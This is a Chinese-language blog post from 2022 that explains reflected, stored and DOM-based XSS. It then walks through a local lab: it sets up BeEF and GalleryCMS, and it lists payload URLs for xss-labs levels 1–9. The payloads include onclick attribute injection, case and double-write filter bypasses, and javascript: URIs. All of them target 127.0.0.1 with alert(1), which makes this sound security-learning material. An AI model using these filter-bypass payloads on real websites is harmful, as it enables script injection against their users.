当前位置:网站首页>xss总结
xss总结
2022-08-04 22:25:00 【李凯 北信】
xss跨站脚本攻击,(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
类型一:反射型
特点:
1非持久型,不保存到正常的服务器数据库在中
2反射型xss的被攻击对象是特定的,使用含有反射型xss的特质url
类型二:储存型
特点:
1持久型,攻击脚本将被永久的存放在目标服务器的数据库或文件中,具有很高的隐蔽性
2储存型xss非特定攻击用户,攻击者将存储型xss代码写进有xss的网站上后,只要有访问这个连接就会被攻击
类型三:dom型
特点: 反射型xss和存储型xss会与后台交互,DOM型xss的实现过程都是在前台
DOM(Document Object Model),是一种文档对象模型,DOM通常用于代表在HTML、XHTML和XML中的对象,使用DOM可以允许程序和脚本动态地访问和更新文档的内容、结构和样式,本质就是一种树状的模型。 DOM型XSS是基于DOM文档对象模型的一种漏洞,所以受客户端浏览器的脚本代码所影响,而不是想前面两种会与服务器交互(不是解析,是交互)。 DOM型XSS是取决于输出的位置,并不取决于输出环境,因此也可以说DOM型XSS既有可能是反射型的,也有可能是存储型的,就是说它的输出点是在DOM位置上。
复现20字符短域名绕过
一、安装BEEF
1、在Kali中运行apt install beef-xss
2、运行beef
3、在浏览器访问
二、安装galleryCMS
*遇到一点小问题
解决方法:手动创建
mysql> create database gallerycms; Query OK, 1 row affected (0.00 sec)
2、点击注册后弹出错误提示
Error Number: 1364
Field 'last_ip' doesn't have a default value
INSERT INTO user
(email_address
, password
, is_active
, is_admin
, created_at
, uuid
, updated_at
) VALUES ('[email protected]', 'd033e22ae348aeb5660fc2140aec35850c4da997', 1, 1, '2022-07-28 16:25:01', 'c6631386-0e4e-11ed-97c4-0a002700000c', '2022-07-28 16:25:01')
Filename: D:\phpstudy_pro\WWW\GalleryCMS-2.0\system\database\DB_driver.php
Line Number: 330
提示"last_ip"不能为空
解决方法:cmd进入数据库,添加"last_ip"字段,手动插入数据
mysql> use gallerycms; Database changed mysql> INSERT INTO user
(email_address
, password
, is_active
, is_admin
, created_at
, uuid
, updated_at
,last_ip
) VALUES ('[email protected]', 'd033e22ae348aeb5660fc2140aec35850c4da997', 1, 1, '2022-07-28 16:33:16', 'ed87d8bb-0e4f-11ed-97c4-0a002700000c', '2022-07-28 16:33:16','127.0.0.1'); Query OK, 1 row affected (0.00 sec)
刷新后登录成功进入
三、开始复现
1、创建一个栏目
2、准备绕过
<script>标签过长,使用<svg>标签,但也不够
3、缩短域名(域名跳转or重定向国内需要备案)+unicode三合一
℠ expands to sm ㏛ expands to sr st expands to st ㎭ expands to rad ℡ expands to tel
绕过 1级
http://127.0.0.1/xsslabs/level1.php?name=<script>alert(1)</script>
2级http://127.0.0.1/xsslabs/level2.php?keyword=1"οnclick="alert(1)
3级
http://127.0.0.1/xsslabs/level3.php?keyword=1'οnclick='alert(1)
4级
http://127.0.0.1/xsslabs/level4.php?keyword=1"οnclick="alert(1)
5级
http://127.0.0.1/xsslabs/level5.php?keyword=1">11111
6级
大小写未过滤【HTML不区分大小写,HTML->JavaScript生效】 http://127.0.0.1/xsslabs/level6.php?keyword=1"Onclick="alert(1)
7级
【双写过滤处】 http://127.0.0.1/xsslabs/level7.php?keyword=1"oonnclick="alert(1)
8级将字符转为ascll码
javascript:alert('1')
javascript:alert('1')
9级跳过过滤(将编码转换ascll)
javascript>>>>>javascript:alert('1
边栏推荐
猜你喜欢
随机推荐
重新配置chrome中ffmpeg插件
各行各业都受到重创,游戏行业却如火如荼,如何加入游戏模型师职业
测试薪资这么高?刚毕业20K,仅需3.5个月
[Mock Interview - 10 Years of Work] Are more projects an advantage?
VSCode—常用快捷键(持续记录
年薪40W测试工程师成长之路,你在哪个阶段?
3D建模师为了让甲方爸爸过稿,还可以这么做,就是在赚血汗钱啊
边缘检测——(纯享版)
快速web开发框架——learun framework
基于事实的结果
Rt-thread [二] 系统初始化流程
Charles & TCPDump & Fiddler 抓包三兄弟七夕联手,还抓不到你的心?
Redisson
【TCP/IP 五 ICMP】
OC-类簇
Operations on std::vector
PowerBI真经连续剧
Milvus configuration related
PHP(3)
Excel商业智能-Power BI电商数据分析实战